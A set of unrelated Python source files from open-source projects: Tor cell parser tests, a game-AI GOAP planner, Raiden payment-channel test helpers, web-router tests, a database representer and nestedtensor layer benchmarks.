'cell-type': NetInfoCell,
'cell-bytes-good-nopadding': netinfo_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = NETINFO_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = OrderedDict()
self.cell_attributes['other_or_address'] = TLVTriple(u'127.0.0.1')
self.cell_attributes['this_or_addresses'] = [TLVTriple(u'127.0.0.1')]
self.cell_attributes['timestamp'] = struct.pack('!I', 0)
self.bad_parse_inputs = (netinfo_parse_bad_num_addresses,)
self.bad_make_inputs = (netinfo_make_bad_num_addresses,)
self.encrypted = False
# IPv6 type type/length/value
netinfo_bytes_good_ipv6 = struct.pack(
'!HBIBB16sBBB16s',
CIRC_ID, NETINFO_CMD,
0, 6, 16, "\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x02\xb3\xff\xfe\x1e\x83)",
1, 6, 16, "\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x02\xb3\xff\xfe\x1e\x83)",
)
netinfo_bytes_good_padded_ipv6 = FixedLenCell.padCellBytes(netinfo_bytes_good_ipv6)
assert len(netinfo_bytes_good_padded_ipv6) == 512
class NetInfoCellIPv6Tests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': netinfo_bytes_good_padded_ipv6,
'cell-type': NetInfoCell,
'cell-bytes-good-nopadding': netinfo_bytes_good_ipv6,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = NETINFO_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = OrderedDict()
self.cell_attributes['other_or_address'] = TLVTriple(u'fe80:0000:0000:0000:0202:b3ff:fe1e:8329')
self.cell_attributes['this_or_addresses'] = [TLVTriple(u'fe80:0000:0000:0000:0202:b3ff:fe1e:8329')]
self.cell_attributes['timestamp'] = struct.pack('!I', 0)
self.bad_parse_inputs = ()
self.bad_make_inputs = ()
self.encrypted = False
# PaddingCell unittests and constant values
PADDING_CMD = 0
padding_bytes_good = struct.pack(
'!HB509s',
CIRC_ID, PADDING_CMD,
"\x00" * 509,
)
padding_bytes_good_padded = padding_bytes_good
assert len(padding_bytes_good_padded) == 512
class PaddingCellTests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': padding_bytes_good_padded,
'cell-type': PaddingCell,
'cell-bytes-good-nopadding': padding_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = PADDING_CMD
self.cell_header['link_version'] = 3
# padding cells don't have any attributes, and they don't really
# have 'bad' inputs, as the payload must be ignored
self.cell_attributes = {}
self.bad_parse_inputs = ()
self.bad_make_inputs = ()
self.encrypted = False
|
412598
|
from globals import *
import life as lfe
import alife
import logging
import os
def add_goal(life, goal_name, desire, require, tier, loop_until, set_flags):
if tier == 'relaxed':
_tier = TIER_RELAXED
elif tier == 'survival':
_tier = TIER_SURVIVAL
elif tier == 'urgent':
_tier = TIER_URGENT
elif tier == 'combat':
_tier = TIER_COMBAT
elif tier == 'tactic':
_tier = TIER_TACTIC
else:
logging.error('Invalid tier in life type \'%s\': %s' % (life['species'], tier))
_tier = TIER_RELAXED
life['goap_goals'][goal_name] = {'desire': desire.split(','),
'require': require.split(','),
'tier': _tier,
'loop_until': loop_until.split(','),
'set_flags': set_flags.split(',')}
#logging.debug('Created goal: %s' % goal_name)
def remove_goal(life, goal_name):
logging.warning('TODO: Remove blacklist.')
if not goal_name in life['goap_goals_blacklist']:
life['goap_goals_blacklist'].append(goal_name)
def add_action(life, action_name, desire, require, satisfies, loop_until, execute, set_flags, non_critical):
life['goap_actions'][action_name] = {'desire': desire.split(','),
'require': require.split(','),
'satisfies': satisfies.split(','),
'loop_until': loop_until.split(','),
'execute': execute,
'set_flags': set_flags.split(','),
'non_critical': non_critical == 'true'}
#logging.debug('Created action: %s' % action_name)
def parse_goap(life):
logging.debug('Parsing GOAP for life type \'%s\'' % life['species'])
_action_name = ''
_goal_name = ''
_desire = ''
_require = ''
_tier = ''
_loop_until = ''
_set_flags = ''
_execute = ''
_satisfies = ''
_non_critical = False
with open(os.path.join(LIFE_DIR, life['species']+'.goap'), 'r') as _goap:
for line in _goap.readlines():
line = line.rstrip().lower()
if line.startswith('[goal_'):
_goal_name = line.split('[')[1].split(']')[0].partition('_')[2]
elif line.startswith('[action_'):
_action_name = line.split('[')[1].split(']')[0].partition('_')[2]
elif line.startswith('tier'):
_tier = line.partition(':')[2].strip()
elif line.startswith('desire'):
_desire = line.partition(':')[2].strip()
elif line.startswith('require'):
_require = line.partition(':')[2].strip()
elif line.startswith('set_flags'):
_set_flags = line.partition(':')[2].strip()
elif line.startswith('loop_until'):
_loop_until = line.partition(':')[2].strip()
elif line.startswith('execute'):
_execute = line.partition(':')[2].strip()
elif line.startswith('satisfies'):
_satisfies = line.partition(':')[2].strip()
elif line.startswith('non_critical'):
_non_critical = line.partition(':')[2].strip()
elif not line:
if _goal_name:
add_goal(life, _goal_name, _desire, _require, _tier, _loop_until, _set_flags)
_goal_name = ''
_desire = ''
_require = ''
_tier = ''
_loop_until = ''
_set_flags = ''
elif _action_name:
add_action(life, _action_name, _desire, _require, _satisfies, _loop_until, _execute, _set_flags, _non_critical)
_action_name = ''
_desire = ''
_require = ''
_tier = ''
_loop_until = ''
_set_flags = ''
_execute = ''
_satisfies = ''
_non_critical = False
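# Illustrative sketch (not part of the original file): parse_goap above reads a
# '<species>.goap' file built from blank-line separated [goal_*] and [action_*]
# sections. The section names, functions and flags shown here are hypothetical.
#
# [goal_find_food]
# tier: survival
# desire: has_food
# require: is_hungry
# loop_until: has_food
# set_flags: searching
#
# [action_forage]
# desire:
# require: !in_combat
# satisfies: has_food
# loop_until: has_food
# execute: forage_for_food
# set_flags: foraging
# non_critical: true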
def find_actions_that_satisfy(life, desires, debug=False):
_valid_actions = []
for action in life['goap_actions']:
_break = False
#_run_anyways = False
for desire in desires:
_continue_instead = False
if desire.startswith('-'):
continue
elif desire.startswith('*'):
_continue_instead = True
#elif desire.startswith('+'):
# _run_anyways = True
_desire = desire.replace('-', '').replace('*', '')
if not _desire in life['goap_actions'][action]['satisfies']:
if _continue_instead:
continue
else:
if debug:
print 'action %s failed to meet the desires of %s' % (action, _desire)
_break = True
break
if _break:
continue
if len(life['goap_actions'][action]['require'][0]):
for requirement in life['goap_actions'][action]['require']:
_requirement = requirement
if _requirement.startswith('!'):
_requirement = _requirement[1:]
_true = False
else:
_true = True
if not FUNCTION_MAP[_requirement](life) == _true:
if debug:
print '\tFailed at:%s' % _requirement
_break = True
break
elif debug:
print '\tPassed:%s' % _requirement
if _break:
continue
_looping = False
for loop_until_func in life['goap_actions'][action]['loop_until']:
if not loop_until_func:
raise Exception('Error in loop_until for action: %s' % action)
if not execute(life, loop_until_func):
_looping = True
if _looping:
_valid_actions.append(action)
break
if _valid_actions and life['goap_actions'][_valid_actions[0]]['desire']:
_valid_actions.extend(find_actions_that_satisfy(life, life['goap_actions'][_valid_actions[0]]['desire']))
#print 'Valid:', _valid_actions
return _valid_actions
def has_valid_plan_for_goal(life, goal_name, debug=False):
_debug = debug == goal_name
_plan = find_actions_that_satisfy(life, life['goap_goals'][goal_name]['desire'], debug=_debug)
_plan.reverse()
#Revise
_check_next = False
for action in _plan[:]:
if life['goap_actions'][action]['non_critical']:
_check_next = True
elif _check_next:
_break = False
for loop_until_func in life['goap_actions'][action]['loop_until']:
if not FUNCTION_MAP[loop_until_func](life):
_break = True
break
if not _break:
_plan.remove(action)
_check_next = False
return _plan
def execute(life, func):
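# Prefix conventions handled below (summary added for clarity): '!' negates the
# expected result, '%' calls the mapped function without the `life` argument,
# and '-' / '*' markers carried over from desire strings are simply stripped
# before the function is looked up in FUNCTION_MAP.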
_true = True
_self_call = False
while 1:
if func.startswith('!'):
func = func[1:]
_true = False
elif func.startswith('%'):
func = func[1:]
_self_call = True
elif func.startswith('-'):
func = func[1:]
elif func.startswith('*'):
func = func[1:]
else:
break
if func == 'set_raid_location':
print 'CHECKS OUT' * 100
if _self_call:
if FUNCTION_MAP[func]() == _true:
return True
elif FUNCTION_MAP[func](life) == _true:
return True
return False
def execute_plan(life, plan):
for action in plan:
_actions = len(life['actions'])
#try:
if not FUNCTION_MAP[life['goap_actions'][action]['execute']](life):
break
if not life['state_action'] == life['goap_actions'][action]['execute']:
life['path'] = []
life['state_action'] = life['goap_actions'][action]['execute']
#except KeyError:
# raise Exception('Invalid function in life type \'%s\' for action \'%s\': %s' % (life['species'], action, life['goap_actions'][action]['execute']))
def get_next_goal(life, debug=False):
_next_goal = {'highest': None, 'goal': None, 'plan': None}
for goal in life['goap_goals']:
_break = False
if debug == goal:
print
print goal
if len(life['goap_goals'][goal]['require'][0]):
for requirement in life['goap_goals'][goal]['require']:
_requirement = requirement
_single = False
if _requirement.startswith('!'):
_requirement = _requirement[1:]
_true = False
else:
_true = True
if _requirement.startswith('%'):
_requirement = _requirement[1:]
_single = True
if _single:
_func = FUNCTION_MAP[_requirement]()
else:
_func = FUNCTION_MAP[_requirement](life)
if not _func == _true:
if debug == goal:
print '\tFailed at:%s' % _requirement
_break = True
break
elif debug == goal:
print '\tPassed:%s' % _requirement
#elif SETTINGS['following'] == life['id']:
# print '[state_%s] Requirement passed: %s (wanted %s)' % (goal, _requirement, _true)
# print FUNCTION_MAP[_requirement](life)
# print 'vis threats', [LIFE[l]['name'] for l in life['seen']], alife.judgement.get_visible_threats(life)
if _break:
continue
for desire in life['goap_goals'][goal]['desire']:
if '*' in desire:
continue
if execute(life, desire):
_loop = False
if life['goap_goals'][goal]['loop_until'] and len(life['goap_goals'][goal]['loop_until'][0]):
_loop = True
for func in life['goap_goals'][goal]['loop_until']:
if execute(life, func):
_loop = False
break
if not _loop:
_break = True
break
if _break:
continue
_plan = has_valid_plan_for_goal(life, goal, debug=debug)
if not _plan:
_plan = ['idle']
if _plan and life['goap_goals'][goal]['tier'] > _next_goal['highest']:
_next_goal['highest'] = life['goap_goals'][goal]['tier']
_next_goal['goal'] = goal
_next_goal['plan'] = _plan
#elif not _plan:
# logging.warning('Failed to find plan for goal \'%s\'.' % goal)
return _next_goal['goal'], _next_goal['highest'], _next_goal['plan']
def think(life):
_goal_name = life['state']
#TODO: Cache this
_plan = has_valid_plan_for_goal(life, _goal_name)
execute_plan(life, _plan)
|
412599
|
from .extract_patches import extract_tensor_patches, ExtractTensorPatches
from .max_blur_pool import max_blur_pool2d, MaxBlurPool2d
__all__ = ["extract_tensor_patches", "max_blur_pool2d", "ExtractTensorPatches", "MaxBlurPool2d"]
|
412613
|
from dataclasses import dataclass, replace
from hypothesis.strategies import builds, composite, integers, sampled_from
from raiden.messages.decode import lockedtransfersigned_from_message
from raiden.messages.encode import message_from_sendevent
from raiden.messages.transfers import LockedTransfer
from raiden.tests.utils import factories
from raiden.transfer.identifiers import CanonicalIdentifier
from raiden.transfer.mediated_transfer.events import (
SendLockedTransfer,
SendSecretRequest,
SendSecretReveal,
SendUnlock,
)
from raiden.transfer.mediated_transfer.initiator import send_lockedtransfer
from raiden.transfer.mediated_transfer.state import (
LockedTransferSignedState,
TransferDescriptionWithSecretState,
)
from raiden.transfer.mediated_transfer.state_change import (
ActionInitInitiator,
ActionInitTarget,
ReceiveSecretRequest,
ReceiveSecretReveal,
)
from raiden.transfer.state import HopState, NettingChannelState, RouteState
from raiden.transfer.state_change import ReceiveUnlock
from raiden.utils.signer import LocalSigner
from raiden.utils.typing import (
MYPY_ANNOTATION,
Address,
Any,
BlockNumber,
List,
MessageID,
PrivateKey,
)
def signed_transfer_from_description(
private_key: PrivateKey,
description: TransferDescriptionWithSecretState,
channel: NettingChannelState,
message_id: MessageID,
block_number: BlockNumber,
route_state: RouteState,
route_states: List[RouteState],
) -> LockedTransferSignedState:
send_locked_transfer = send_lockedtransfer(
transfer_description=description,
channel_state=channel,
message_identifier=message_id,
block_number=block_number,
route_state=route_state,
route_states=route_states,
)
message = message_from_sendevent(send_locked_transfer)
assert isinstance(message, LockedTransfer), MYPY_ANNOTATION
message.sign(LocalSigner(private_key))
return lockedtransfersigned_from_message(message)
def action_init_initiator_to_action_init_target(
action: ActionInitInitiator,
channel: NettingChannelState,
block_number: BlockNumber,
route_state: RouteState,
address: Address,
private_key: PrivateKey,
) -> ActionInitTarget:
transfer = signed_transfer_from_description(
private_key=private_key,
description=action.transfer,
channel=channel,
message_id=factories.make_message_identifier(),
block_number=block_number,
route_state=route_state,
route_states=action.routes,
)
from_hop = HopState(node_address=address, channel_identifier=channel.identifier)
return ActionInitTarget(
from_hop=from_hop, transfer=transfer, sender=address, balance_proof=transfer.balance_proof
)
@dataclass(frozen=True)
class SendSecretRequestInNode:
event: SendSecretRequest
node: Address
def send_secret_request_to_receive_secret_request(
source: SendSecretRequestInNode,
) -> ReceiveSecretRequest:
return ReceiveSecretRequest(
sender=source.node,
payment_identifier=source.event.payment_identifier,
amount=source.event.amount,
expiration=source.event.expiration,
secrethash=source.event.secrethash,
)
@dataclass(frozen=True)
class SendSecretRevealInNode:
event: SendSecretReveal
node: Address
def send_secret_reveal_to_recieve_secret_reveal(
source: SendSecretRevealInNode,
) -> ReceiveSecretReveal:
return ReceiveSecretReveal(
sender=source.node, secrethash=source.event.secrethash, secret=source.event.secret
)
@dataclass(frozen=True)
class SendLockedTransferInNode:
event: SendLockedTransfer
action: ActionInitInitiator
node: Address
private_key: PrivateKey
def send_lockedtransfer_to_locked_transfer(source: SendLockedTransferInNode) -> LockedTransfer:
locked_transfer = message_from_sendevent(source.event)
assert isinstance(locked_transfer, LockedTransfer), MYPY_ANNOTATION
locked_transfer.sign(LocalSigner(source.private_key))
return locked_transfer
def locked_transfer_to_action_init_target(locked_transfer: LockedTransfer) -> ActionInitTarget:
from_transfer = lockedtransfersigned_from_message(locked_transfer)
channel_id = from_transfer.balance_proof.channel_identifier # pylint: disable=no-member
from_hop = HopState(
node_address=Address(locked_transfer.initiator), channel_identifier=channel_id
)
init_target_statechange = ActionInitTarget(
from_hop=from_hop,
transfer=from_transfer,
balance_proof=from_transfer.balance_proof,
sender=from_transfer.balance_proof.sender, # pylint: disable=no-member
)
return init_target_statechange
@dataclass(frozen=True)
class SendUnlockInNode:
event: SendUnlock
node: Address
private_key: PrivateKey
def send_unlock_to_receive_unlock(
source: SendUnlockInNode, canonical_identifier: CanonicalIdentifier
) -> ReceiveUnlock:
mirrored_balance_proof = replace(
source.event.balance_proof, canonical_identifier=canonical_identifier
)
signed_balance_proof = factories.make_signed_balance_proof_from_unsigned(
unsigned=mirrored_balance_proof, signer=LocalSigner(source.private_key)
)
return ReceiveUnlock(
sender=source.node,
message_identifier=source.event.message_identifier,
secret=source.event.secret,
secrethash=source.event.secrethash,
balance_proof=signed_balance_proof,
)
@dataclass
class Scrambling:
field: str
value: Any
@property
def kwargs(self):
return {self.field: self.value}
@composite
def scrambling(draw, fields):
field = draw(sampled_from(list(fields.keys())))
value = draw(fields[field])
return Scrambling(field, value)
@composite
def balance_proof_scrambling(draw):
fields = {
"nonce": builds(factories.make_nonce),
"transferred_amount": integers(min_value=0),
"locked_amount": integers(min_value=0),
"locksroot": builds(factories.make_locksroot),
"canonical_identifier": builds(factories.make_canonical_identifier),
"balance_hash": builds(factories.make_transaction_hash),
}
return draw(scrambling(fields)) # pylint: disable=no-value-for-parameter
@composite
def hash_time_lock_scrambling(draw):
fields = {
"amount": integers(min_value=0),
"expiration": integers(min_value=1),
"secrethash": builds(factories.make_secret_hash),
}
return draw(scrambling(fields)) # pylint: disable=no-value-for-parameter
@composite
def locked_transfer_scrambling(draw):
fields = {
"token": builds(factories.make_token_address),
"token_network_address": builds(factories.make_token_network_address),
"channel_identifier": builds(factories.make_channel_identifier),
"chain_id": builds(factories.make_chain_id),
}
return draw(scrambling(fields)) # pylint: disable=no-value-for-parameter
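# Illustrative usage sketch (not part of the original module): a drawn `Scrambling`
# is meant to be applied to a dataclass instance via `dataclasses.replace`, e.g. from
# inside a hypothesis test. The test name and the `balance_proof` placeholder below
# are hypothetical.
#
#     @given(scrambled=balance_proof_scrambling())
#     def test_tampered_balance_proof_is_rejected(scrambled):
#         tampered = replace(balance_proof, **scrambled.kwargs)
#         ...  # assert that the tampered balance proof fails validation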
|
412663
|
import pytest
from cocopot.routing import Router
from cocopot.exceptions import BadRequest, NotFound, MethodNotAllowed
def test_basic_routing():
r = Router()
r.add('/', endpoint='index')
r.add('/foo', endpoint='foo')
r.add('/bar/', endpoint='bar')
assert r.match('/') == ('index', {})
assert r.match('/foo') == ('foo', {})
assert r.match('/bar/') == ('bar', {})
pytest.raises(NotFound, lambda: r.match('/blub'))
pytest.raises(MethodNotAllowed, lambda: r.match('/foo', method='POST'))
def test_basic_routing2():
r = Router(strict=True)
r.add('/', endpoint='index')
r.add('/foo', endpoint='foo')
r.add('/bar/', endpoint='bar')
assert r.match('/') == ('index', {})
assert r.match('/foo') == ('foo', {})
assert r.match('/bar/') == ('bar', {})
pytest.raises(NotFound, lambda: r.match('/blub'))
pytest.raises(MethodNotAllowed, lambda: r.match('/foo', method='POST'))
def test_dynamic_routing():
r = Router()
r.add('/<name>', endpoint='index')
r.add('/foo/<string:name2>', endpoint='foo')
r.add('/bar/<int:bar>', endpoint='bar')
r.add('/float/<float:bar2>', endpoint='bar2')
r.add('/path/<path:bar3>', endpoint='bar3')
assert r.match('/foo') == ('index', {'name': 'foo'})
assert r.match('/foo/bar') == ('foo', {'name2': 'bar'})
assert r.match('/bar/20') == ('bar', {'bar': 20})
assert r.match('/float/20.333') == ('bar2', {'bar2': 20.333})
assert r.match('/path/foo/bar/xxx') == ('bar3', {'bar3': 'foo/bar/xxx'})
def test_default_values():
r = Router()
r.add('/<name>', endpoint='index', defaults={'foo': 1234, 'name':'bar'})
assert r.match('/foo') == ('index', {'name': 'foo', 'foo': 1234})
|
412665
|
from ..adapters.mssql import MSSQL
from .base import SQLRepresenter, JSONRepresenter
from . import representers, before_type, for_type
@representers.register_for(MSSQL)
class MSSQLRepresenter(SQLRepresenter, JSONRepresenter):
def _make_geoextra(self, field_type, srid):
geotype, params = field_type[:-1].split('(')
if params:
srid = params
return {'srid': srid}
@before_type('geometry')
def geometry_extras(self, field_type):
return self._make_geoextra(field_type, 0)
@for_type('geometry', adapt=False)
def _geometry(self, value, srid):
return "geometry::STGeomFromText('%s',%s)" % (value, srid)
@before_type('geography')
def geography_extras(self, field_type):
return self._make_geoextra(field_type, 4326)
@for_type('geography', adapt=False)
def _geography(self, value, srid):
return "geography::STGeomFromText('%s',%s)" % (srid, value)
|
412690
|
import logging
import tqdm
import numpy as np
def evaluate(model, tasks, iterator, cuda_device, split="val"):
'''Evaluate on a dataset'''
model.eval()
all_preds = {}
n_overall_examples = 0
for task in tasks:
n_examples = 0
task_preds, task_idxs, task_labels = [], [], []
if split == "val":
dataset = task.val_data
elif split == 'train':
dataset = task.train_data
elif split == "test":
dataset = task.test_data
generator = iterator(dataset, num_epochs=1, shuffle=False, cuda_device=cuda_device)
generator_tqdm = tqdm.tqdm(generator, total=iterator.get_num_batches(dataset), disable=True)
for batch in generator_tqdm:
tensor_batch = batch
out = model.forward(task, **tensor_batch)
n_examples += batch['label'].size()[0]
preds, _ = out['logits'].max(dim=1)
task_preds += list(preds.data.cpu().numpy())
task_labels += list(batch['label'].squeeze().data.cpu().numpy())
task_metrics = task.get_metrics(reset=True)
logging.info('\n***** TEST RESULTS *****')
for shot in ['Overall', 'Many', 'Medium', 'Few']:
logging.info(f" * {shot}: MSE {task_metrics[shot.lower()]['mse']:.3f}\t"
f"L1 {task_metrics[shot.lower()]['l1']:.3f}\t"
f"G-Mean {task_metrics[shot.lower()]['gmean']:.3f}\t"
f"Pearson {task_metrics[shot.lower()]['pearsonr']:.3f}\t"
f"Spearman {task_metrics[shot.lower()]['spearmanr']:.3f}\t"
f"Number {task_metrics[shot.lower()]['num_samples']}")
n_overall_examples += n_examples
task_preds = [min(max(np.float32(0.), pred * np.float32(5.)), np.float32(5.)) for pred in task_preds]
all_preds[task.name] = (task_preds, task_idxs)
return task_preds, task_labels, task_metrics['overall']['mse']
|
412720
|
import numpy as np
from analysis.analysis_utils import corr_frame_stim
from unittest import TestCase
class TestAnalysisUtils(TestCase):
def test_corr_frame_stim(self):
f = np.array([[0., 1], # Time, frame
[1., 2],
[2., 3],
[3., 5],
[4., 6],
[50., 7]])
s = np.array([[0.5, 99], # Time, stim
[1, 96],
[3, 91],
[7, 42]])
expected = np.array([[1., np.nan], # t = 0 No stim info.
[2., 96.], # t = 1 Stim newly updated.
[3., 96.], # t = 2 Use data at t = 1
[5., 91.], # t = 3 Stim newly updated.
                             [6., 91.],       # t = 4 Use data at t = 3
[7., 42.]]) # t = 50 Use data at t = 7
        self.assertTrue(np.allclose(corr_frame_stim(f, s), expected, equal_nan=True))
|
412748
|
def extractUntunedTranslation(item):
"""
"""
title = item['title'].replace(' III(', ' vol 3 (').replace(' III:', ' vol 3:').replace(' II:', ' vol 2:').replace(' I:', ' vol 1:').replace(' IV:', ' vol 4:').replace(
' V:', ' vol 5:')
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
if not (chp or vol) or 'preview' in item['title'].lower():
return None
tagmap = [
('meg and seron', 'Meg and Seron', 'translated'),
('kino\'s journey', 'Kino\'s Journey', 'translated'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
if 'meg and seron' in item['tags'] and chp and vol:
return buildReleaseMessageWithType(item, 'Meg and Seron', vol, chp, frag=frag, postfix=postfix)
if 'lillia and treize' in item['tags'] and chp and vol:
return buildReleaseMessageWithType(item, 'Lillia to Treize', vol, chp, frag=frag, postfix=postfix)
return False
|
412767
|
from distutils.core import Extension
def get_extension():
return Extension(
'japronto.router.cmatcher',
sources=['cmatcher.c', 'match_dict.c', '../capsule.c'],
include_dirs=['.', '../request', '..', '../response'])
|
412796
|
import torch
import nestedtensor
import utils
import torch.nn.functional as F
import sys
import random
import argparse
import itertools
import re
import csv
Benchmarks = {}
def register_benchmark(fn):
Benchmarks[fn.__name__] = fn
#
# relu
#
@register_benchmark
def relu__tensor_iter(self):
def _relu_tensor_iter():
for t in self.inputs:
torch.nn.functional.relu_(t)
return _relu_tensor_iter
@register_benchmark
def relu__tensor_pad(self):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _relu_tensor_pad():
torch.nn.functional.relu_(tensor)
return _relu_tensor_pad
@register_benchmark
def relu__nt(self):
nt = nestedtensor.nested_tensor(self.inputs)
def _relu_nt():
torch.nn.functional.relu_(nt)
return _relu_nt
@register_benchmark
def relu_tensor_iter(self):
def _relu_tensor_iter():
for t in self.inputs:
torch.nn.functional.relu(t)
return _relu_tensor_iter
@register_benchmark
def relu_tensor_pad(self):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _relu_tensor_pad():
torch.nn.functional.relu(tensor)
return _relu_tensor_pad
@register_benchmark
def relu_nt(self):
nt = nestedtensor.nested_tensor(self.inputs)
def _relu_nt():
torch.nn.functional.relu(nt)
return _relu_nt
#
# conv2d
#
@register_benchmark
def conv2d_iter(self, module):
def _conv2d_tensor_iter():
for t in self.inputs:
module(t.unsqueeze(0)).squeeze(0)
return _conv2d_tensor_iter
@register_benchmark
def conv2d_pad(self, module):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _conv2d_tensor():
module(tensor)
return _conv2d_tensor
@register_benchmark
def conv2d_nt(self, module):
nt = nestedtensor.nested_tensor(self.inputs)
def _conv2d():
module(nt)
return _conv2d
#
# batch_norm
#
@register_benchmark
def batch_norm_tensor_iter(self, module):
def _batch_norm_tensor_iter():
for t in self.inputs:
module(t.unsqueeze(0)).squeeze(0)
return _batch_norm_tensor_iter
@register_benchmark
def batch_norm_tensor_pad(self, module):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _batch_norm_tensor_pad():
module(tensor)
return _batch_norm_tensor_pad
@register_benchmark
def batch_norm_nt(self, module):
nt = nestedtensor.nested_tensor(self.inputs)
def _batch_norm_nt():
module(nt)
return _batch_norm_nt
#
# max_pool2d
#
@register_benchmark
def max_pool2d_tensor_iter(self, module):
def _max_pool2d_tensor_iter():
for t in self.inputs:
module(t.unsqueeze(0)).squeeze(0)
return _max_pool2d_tensor_iter
@register_benchmark
def max_pool2d_tensor_pad(self, module):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _max_pool2d_tensor_pad():
module(tensor)
return _max_pool2d_tensor_pad
@register_benchmark
def max_pool2d_nt(self, module):
nt = nestedtensor.nested_tensor(self.inputs)
def _max_pool2d_nt():
module(nt)
return _max_pool2d_nt
#
# cross_entropy
#
@register_benchmark
def cross_entropy_tensor_iter(self):
def _cross_entropy_tensor_iter():
for a, b in zip(self.inputs, self.targets):
torch.nn.functional.cross_entropy(
a.unsqueeze(0), b.unsqueeze(0)
).squeeze(0)
return _cross_entropy_tensor_iter
@register_benchmark
def cross_entropy_tensor_pad(self):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
targets, _ = nestedtensor.nested_tensor(self.targets).to_tensor_mask()
def _cross_entropy_tensor_pad():
torch.nn.functional.cross_entropy(tensor, targets)
return _cross_entropy_tensor_pad
@register_benchmark
def cross_entropy_nt(self):
nt_input = nestedtensor.nested_tensor(self.inputs)
nt_targets = nestedtensor.nested_tensor(self.targets)
def _cross_entropy_nt():
torch.nn.functional.cross_entropy(nt_input, nt_targets)
return _cross_entropy_nt
#
# dropout
#
@register_benchmark
def dropout_tensor_iter(self):
def _dropout_tensor_iter():
for t in self.inputs:
torch.nn.functional.dropout(t.unsqueeze(0)).squeeze(0)
return _dropout_tensor_iter
@register_benchmark
def dropout_tensor_pad(self):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _dropout_tensor_pad():
torch.nn.functional.dropout(tensor)
return _dropout_tensor_pad
@register_benchmark
def dropout_nt(self):
nt = nestedtensor.nested_tensor(self.inputs)
def _dropout_nt():
torch.nn.functional.dropout(nt)
return _dropout_nt
#
# interpolate
#
@register_benchmark
def interpolate_tensor_iter(self):
def _interpolate_tensor_iter():
for t in self.inputs:
torch.nn.functional.interpolate(t, t.unsqueeze(0).shape[-2])
return _interpolate_tensor_iter
@register_benchmark
def interpolate_tensor_pad(self):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _interpolate_tensor_pad():
torch.nn.functional.interpolate(tensor, tensor[0].unsqueeze(0).shape[-2])
return _interpolate_tensor_pad
@register_benchmark
def interpolate_nt(self):
nt = nestedtensor.nested_tensor(self.inputs)
input_shape = [y[-2:] for y in nt.nested_size().unbind()]
def _interpolate_nt():
torch.nn.functional.interpolate(nt, input_shape)
return _interpolate_nt
class SegLayersBenchMark(object):
def __init__(self, args):
self.args = args
self.layers = {}
def get_benchmark(self, channels, name, cuda):
layer = None
if name.startswith("conv2d"):
m = re.match(r"conv2d_([a-z]+)_(\d+)x(\d+)", name)
if m is None:
raise ValueError("Unsupported parameterization for conv2d layer {}".format(name))
benchmark_kind = m.group(1)
k0 = int(m.group(2))
k1 = int(m.group(3))
# Parameters chosen based on dominant settings in
# https://github.com/pytorch/vision/blob/master/torchvision/models/segmentation/segmentation.py#L19
layer = self.layers.setdefault(
(name, channels, cuda), torch.nn.Conv2d(channels, channels, kernel_size=(k0, k1), dilation=2, bias=False)
)
name = "conv2d_" + benchmark_kind
if name.startswith("batch_norm"):
layer = self.layers.setdefault(
(name, cuda), torch.nn.BatchNorm2d(channels, 1e-05, 0.1).eval()
)
if name.startswith("max_pool2d"):
layer = self.layers.setdefault(
(name, cuda),
torch.nn.MaxPool2d(
kernel_size=(2, 2), stride=(2, 2), padding=(0, 0), dilation=(1, 1)
),
)
try:
if cuda and layer is not None:
layer.cuda()
return Benchmarks[name](self) if layer is None else Benchmarks[name](self, layer)
except KeyError:
raise ValueError("Benchmark {} is not supported. Available benchmarks are\n{}.".format(layer,
"\n".join(sorted(Benchmarks.keys()))))
def run(self):
params = itertools.product(
self.args.cuda,
self.args.N,
self.args.C,
self.args.H,
self.args.W,
self.args.seed,
)
if self.args.V:
var_params = [(v, v) for v in self.args.V]
else:
var_params = itertools.product(self.args.HV, self.args.WV)
params = [[p + v for v in var_params] for p in params]
params = sum(params, [])
writer = None
i = 0
for cuda, n, c, h, w, seed, h_var, w_var in params:
            # generate inputs before iterating layers to have the same input per layer
self.inputs, self.targets = self.get_input(cuda, n, c, h, w, h_var, w_var, seed)
benchmarks = [(layer, self.get_benchmark(c, layer, cuda)) for layer in self.args.layers]
for layer, benchmark in benchmarks:
result = utils.benchmark_fn(benchmark, run_time=self.args.run_time, warmup=self.args.warmup, cuda=cuda)
result["#"] = str(i) + "/" + str(len(benchmarks) * len(params))
result["N"] = n
result["C"] = c
result["H"] = h
result["W"] = w
result["h_var"] = h_var
result["w_var"] = w_var
result["seed"] = seed
result["avg_us"] = int(result["avg_us"])
result["std_us"] = int(result["std_us"])
result["name"] = layer
result["cuda"] = cuda
result["numel"] = sum(x.numel() for x in self.inputs)
if writer is None and self.args.csv_log:
writer = csv.DictWriter(open(self.args.csv_log, 'w'), fieldnames=result.keys())
writer.writeheader()
if writer is not None:
writer.writerow(result)
print(",".join(str((str(key), result[key])) for key in sorted(result.keys())))
i += 1
def get_input(self, cuda, n, c, h, w, h_var, w_var, seed):
inputs = []
targets = []
device = 'cpu'
if cuda:
device = 'cuda'
torch.manual_seed(seed)
random.seed(seed)
if cuda:
torch.cuda.init()
for _ in range(n):
